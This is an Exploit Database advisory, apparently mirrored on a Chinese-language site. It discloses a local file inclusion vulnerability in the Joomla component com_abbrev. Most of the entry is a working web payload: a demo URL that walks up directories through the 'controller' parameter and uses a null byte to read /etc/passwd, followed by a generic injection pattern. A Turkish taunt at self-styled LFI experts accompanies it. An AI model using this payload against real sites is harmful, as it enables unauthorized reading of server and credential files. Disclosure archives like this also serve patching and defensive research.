Joomla! Component com_abbrev – Local File Inclusion

Exploit Database
106 阅读

作者： FL0RiX

日期： 2010-01-03
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/10948/

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

<------------------- header data start ------------------- >

[++] Joomla Component com_abbrev Local File Inclusion Vulnerability

[++] author: FL0RiX

[++] Name : com_abbrev

[++] Bug Type : Local File Inclusion

[++] Demo Vuln. :

[++] http://server/index.php?option=com_abbrev&controller=../../../../../../../../../../etc/passwd%00

[++] Note : LFI/RFI Uzmanı Zannedenler Localda Aramazlar :)

< ------------------- header data end of ------------------- >

< -- bug code start -- >

path/index.php?option=com_abbrev&controller=[-LFI-]

< -- bug code end of -- >